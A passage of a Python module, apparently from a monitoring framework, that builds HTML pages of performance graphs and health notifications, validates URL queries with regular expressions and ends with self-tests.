k = ".".join(k.split(".", 2)[:2]) + "." + reading
d[k] = "expanded"
return "&".join("{0:s}={1:s}".format(k, v) for k, v in d.items())
###############################################################################
@typecheck
def _performance_report(html: with_attr("write"), query: dict_of(str, str),
request: dict, response: dict) -> nothing:
# fetch the performance dump, this can return None
stats = pmnc.performance.extract()
if stats is None:
html.write("<html><body>cage {0:s} has nothing to report yet"
"</body></html>".format(__cage__))
return
# extract main thread pool stats
req_active, req_pending, req_rate = pmnc.interfaces.get_activity_stats()
# extract global transaction rate
xa = pmnc.transaction.create(); xa.execute()
txn_rate = xa.get_transaction_rate()
base_time, stats_dump, app_perf = stats
base_dt = datetime.fromtimestamp(base_time)
    # see which objects have data available; we will have to display at least one graph for each
monitored_objects = set(tuple(k.split(".", 2)[:2]) for k in stats_dump.keys())
requested_objects = set(tuple(k.split(".", 2)[:2]) for k in query.keys())
displayed_objects = {}
for object_type, object_name in monitored_objects - requested_objects:
reading, mode = default_reading_modes[object_type]
displayed_objects["{0:s}.{1:s}.{2:s}".format(object_type, object_name, reading)] = mode
# add/override explicitly requested graphs from the URL query
for k, v in query.items():
if k in stats_dump:
displayed_objects[k] = v
# reassemble the canonical URL query
canonical_query = _format_modified_query(displayed_objects)
# format horizontal time scales
base_minute = base_dt.minute % 10
hrule = "---- " + _hrule[base_minute:][:59] + " -----"
plus_count = hrule.count("+")
base_dt10m = datetime.fromtimestamp(base_time // 600 * 600)
base_dt10m -= timedelta(minutes = (plus_count - (base_minute != 0 and 1 or 0)) * 10)
hhmms = [ (base_dt10m + timedelta(minutes = i * 10)).strftime("%H:%M")
for i in range(plus_count) ]
hscale = " " * (hrule.index("+") - 2) + " ".join(hhmms)
hscale += " " * (len(hrule) - len(hscale) - 5) + base_dt.strftime("%H:%M")
hrule = _decorate(hrule)
hscale = _decorate(hscale)
# format header
cpu_ut_percent = int(app_perf.get("cpu_ut_percent", 0.0))
cpu_kt_percent = int(app_perf.get("cpu_kt_percent", 0.0))
if cpu_kt_percent > 0:
cpu_percent = "{0:d}*{1:d}".format(cpu_ut_percent, cpu_kt_percent)
else:
cpu_percent = "{0:d}".format(cpu_ut_percent)
cage_at_node = "cage {0:s} at node {1:s}".format(__cage__, __node__)
activity_info = "{0:d}{1:s} req, {2:.01f} req/s, {3:.01f} txn/s, {4:d} M RAM, {5:s} % CPU".\
format(req_active, req_pending and "*{0:d}".format(req_pending) or "",
req_rate, txn_rate, app_perf.get("wss", 0), cpu_percent)
# write page header
html.write("<html>"
"<head>" +
css_style.format(css_font_family = pmnc.config.get("css_font_family")) +
"<title>Performance report for " + cage_at_node + "</title>"
"</head>"
"<body class=\"default\">"
"<a href=\"/notifications\">logs</a>" + _decorate(" {0:s}<br/>".format(cage_at_node.center(58))) +
_decorate(" {0:s} {1:s}<br/><br/>\n".format(activity_info.center(58), base_dt.strftime("%b %d"))))
html.write("<span style=\"line-height: 1.0;\">\n" + hscale + "<br/>\n" + hrule + "<br/>\n")
# loop through the statistics items to display
for k, mode in sorted(displayed_objects.items()):
if k not in stats_dump: # invalid interface/resource name in URL ?
continue
s1m, s10s = stats_dump[k]
s10s = s10s[:5]
object_type, object_name, reading = k.split(".", 2)
if mode == "collapsed": # draw collapsed graph
def append_bars(b):
result = ""
for i, v in enumerate(b):
c = _collapsed_bar(v)
high = v is not None and v[1] or 0
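                    # "span_class" keeps the underscore on purpose: _decorate() later turns "_" into a space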
result += "<span_class=\"c{0:d}\">{1:s}</span>".format(4 - high // 8, c)
return result
line = "<nobr> {0:s} {1:s} ".format(append_bars(s1m), append_bars(s10s))
html.write(_decorate(line))
# append the clickable expand link
expand_query = _format_modified_query(displayed_objects, expand = k)
html.write("<a href=\"/performance?{0:s}\">{1:s} {2:s} ({3:s})</a></nobr><br/>".\
format(expand_query, object_type, object_name, legends[reading]))
elif mode == "expanded": # draw expanded graph
bars1m = list(zip(*map(_expanded_bar, s1m)))
bars10s = list(zip(*map(_expanded_bar, s10s)))
def append_bars(b, i):
result = ""
b = b[4 - i]
for j in range(len(b)):
c = b[j]
if c.startswith("~"):
result += "<span_class=\"c{0:d}i\">{1:s}</span>".format(i, c[1:]) # note the underscore, will be converted to space
else:
result += c
return result
# expanded form has vertical scale, different for rates and times
if "_time" in k:
ref = _ref_times
elif "_rate" in k:
ref = _ref_rates
# draw each of the 5 horizontal bars
opt_readings = optional_readings[object_type]
for i in range(5):
line = "<nobr>" + ref[i] + "<span class=\"c{0:d}\">".format(i)
_line = append_bars(bars1m, i)
_line += "</span> ~ <span_class=\"c{0:d}\">".format(i) + append_bars(bars10s, i) + " "
line += _decorate(_line) + "</span>"
if i == 0: # append the clickable collapse link
collapse_query = _format_modified_query(displayed_objects, collapse = k)
line += "<a href=\"/performance?{0:s}\">{1:s} {2:s}</a>".\
format(collapse_query, object_type, object_name)
elif i <= len(opt_readings): # append the clickable selector links
opt_reading = opt_readings[i - 1]
modify_query = _format_modified_query(displayed_objects, replace = (k, opt_reading))
line += "{0:s}<a href=\"/performance?{1:s}\">{2:s}</a>{3:s}".\
format(reading == opt_reading and _decorate("» ") or _decorate(" "),
modify_query, legends[opt_reading],
reading == opt_reading and _decorate(" «") or _decorate(" "))
html.write(line + "</nobr><br/>\n")
html.write(hrule + "<br/>\n")
# complete the response
html.write(hscale + "<br/>\n</span>\n</body></html>")
# require a refresh within a configured time
refresh_seconds = pmnc.config.get("refresh_seconds")
response["headers"]["refresh"] = \
"{0:d};URL=/performance?{1:s}".format(refresh_seconds, canonical_query)
###############################################################################
@typecheck
def _notifications_report(html: with_attr("write"), query: dict_of(str, str),
request: dict, response: dict) -> nothing:
# reassemble the canonical URL query
canonical_query = "&".join("{0:s}={1:s}".format(k, v) for k, v in query.items())
# format header
cage_at_node = "cage {0:s} at node {1:s}".format(__cage__, __node__)
# write page header
html.write("<html>"
"<head>" +
css_style.format(css_font_family = pmnc.config.get("css_font_family")) +
"<title>Notifications report for " + cage_at_node + "</title>"
"</head>"
"<body class=\"default\">"
"<a href=\"/performance\">perf</a>" + _decorate(" {0:s}<br/>".format(cage_at_node.center(58))) +
_decorate("most recent health monitor notifications".center(69)) + "<br/><br/>")
    # extract the stored notifications and loop through them
last_day = None
for notification in reversed(pmnc.notify.extract()):
message = _quote(notification["message"])
timestamp = notification["timestamp"]
day = datetime.fromtimestamp(timestamp).strftime("%b %d")
hms = datetime.fromtimestamp(timestamp).strftime("%H:%M:%S")
level = notification["level"]
if level == "INFO":
level = "<span class=\"c4\">INFO </span>"
elif level == "WARNING":
level = "<span class=\"c1\">WARN </span>"
elif level == "ERROR":
level = "<span class=\"c0\">ERROR</span>"
elif level == "ALERT":
level = "<strong><span class=\"c0\">ALERT</span></strong>"
if day != last_day:
html.write(_decorate(" {0:s} ----------------------------------------------------------------<br/>\n".format(day)))
last_day = day
html.write("{0:s} {1:s} <nobr>{2:s}</nobr><br/>\n".\
format(hms, level, message))
# complete the response
html.write(_decorate("------------------------------------------------------------------------<br/>\n"))
html.write("</body></html>")
# require a refresh within a configured time
refresh_seconds = pmnc.config.get("refresh_seconds")
response["headers"]["refresh"] = \
"{0:d};URL=/notifications?{1:s}".format(refresh_seconds, canonical_query)
###############################################################################
valid_perf_query_element = "(interface|resource)\\.[A-Za-z0-9_-]+\\.({0:s})=(collapsed|expanded)".\
format("|".join(legends.keys()))
valid_perf_query = by_regex("^({0:s}(&{0:s})*)?$".format(valid_perf_query_element))
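# e.g. a valid query: "interface.foo.response_time=collapsed&resource.bar.processing_time=expanded"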
valid_ntfy_query = by_regex("^$")
###############################################################################
# this method is called from the HTTP interface for actual request processing
def process_request(request: dict, response: dict):
parsed_url = urlparse(request["url"])
path = parsed_url.path
query = parsed_url.query
html = StringIO()
if path in ("/", "/performance"):
if not valid_perf_query(query):
raise Exception("invalid query format")
query = query and dict(p.split("=") for p in query.split("&")) or {}
_performance_report(html, query, request, response)
elif path == "/notifications":
if not valid_ntfy_query(query):
raise Exception("invalid query format")
query = query and dict(p.split("=") for p in query.split("&")) or {}
_notifications_report(html, query, request, response)
else:
response["status_code"] = 404
return
response["content"] = html.getvalue()
response["headers"]["content-type"] = "text/html"
###############################################################################
def self_test():
from time import sleep
from pmnc.request import fake_request
###################################
def test_collapsed_bar():
assert _collapsed_bar(None) == " "
for low in range(40):
for high in range(low + 1, 40):
assert _collapsed_bar((low, high)) == box_chars[high // 5]
test_collapsed_bar()
###################################
def test_expanded_bar():
assert _expanded_bar(None) == [" ", " ", " ", " ", " "]
assert _expanded_bar((0, 0)) == [b1, " ", " ", " ", " "]
assert _expanded_bar((0, 1)) == [b2, " ", " ", " ", " "]
assert _expanded_bar((0, 4)) == [b5, " ", " ", " ", " "]
assert _expanded_bar((0, 7)) == [b8, " ", " ", " ", " "]
assert _expanded_bar((0, 8)) == [b8, b1, " ", " ", " "]
assert _expanded_bar((0, 9)) == [b8, b2, " ", " ", " "]
assert _expanded_bar((0, 39)) == [b8, b8, b8, b8, b8]
assert _expanded_bar((1, 38)) == ["~" + b1, b8, b8, b8, b7]
assert _expanded_bar((4, 35)) == ["~" + b4, b8, b8, b8, b4]
assert _expanded_bar((7, 32)) == ["~" + b7, b8, b8, b8, b1]
assert _expanded_bar((8, 31)) == [" ", b8, b8, b8, " "]
assert _expanded_bar((9, 30)) == [" ", "~" + b1, b8, b7, " "]
assert _expanded_bar((12, 27)) == [" ", "~" + b4, b8, b4, " "]
assert _expanded_bar((15, 24)) == [" ", "~" + b7, b8, b1, " "]
assert _expanded_bar((16, 23)) == [" ", " ", b8, " ", " "]
assert _expanded_bar((17, 22)) == [" ", " ", b7, " ", " "]
assert _expanded_bar((20, 20)) == [" ", " ", b5, " ", " "]
assert _expanded_bar((0, 15)) == [b8, b8, " ", " ", " "]
assert _expanded_bar((12, 27)) == [" ", "~" + b4, b8, b4, " "]
assert _expanded_bar((24, 39)) == [" ", " ", " ", b8, b8]
assert _expanded_bar((32, 39)) == [" ", " ", " ", " ", b8]
assert _expanded_bar((35, 39)) == [" ", " ", " ", " ", b8]
assert _expanded_bar((39, 39)) == [" ", " ", " ", " ", b8]
test_expanded_bar()
###################################
def test_notifications():
request = dict(url = "/notifications",
method = "GET", headers = {}, body = b"")
response = dict(status_code = 200, headers = {}, body = b"")
pmnc.__getattr__(__name__).process_request(request, response)
assert response["status_code"] == 200
content = response["content"]
assert "Notifications report" in content
test_notifications()
###################################
def test_performance():
fake_request(120.0)
for i in range(90):
pmnc.performance.event("interface.foo.response_rate.success")
pmnc.performance.sample("interface.foo.response_time.success", 10)
pmnc.performance.event("resource.bar.transaction_rate.success")
pmnc.performance.sample("resource.bar.processing_time.success", 10)
sleep(1.0)
pmnc.log("wait {0:d}/90".format(i + 1))
request = dict(url = "/?"
"interface.foo.request_rate=expanded&"
"interface.foo.response_rate.success=collapsed&"
"interface.foo.response_time=expanded&"
"interface.foo.response_time.success=collapsed&"
"resource.bar.transaction_rate=expanded&"
"resource.bar.transaction_rate.success=collapsed&"
"resource.bar.processing_time=expanded&"
"resource.bar.processing_time.success=collapsed",
method = "GET", headers = {}, body = b"")
response = dict(status_code = 200, headers = {}, body = b"")
pmnc.__getattr__(__name__).process_request(request, response)
assert response["status_code"] == 200
content = response["content"]
# difficult to assert anything reasonable about the response content here
assert "10.0" in content and "100" in content
assert "interface foo (successful response rate)" in content
assert "interface foo (successful response time)" in content
assert "resource bar (successful transaction rate)" in content
assert "resource bar (successful processing time)" in content
assert "request rate</a>" in content
assert "response time</a>" in content
assert "transaction rate</a>" in content
assert "processing time</a>" in content
assert "RAM" in content
assert "CPU" in content
test_performance()
if __name__ == "__main__": import pmnc.self_test; pmnc.self_test.run()
###############################################################################
# EOF
|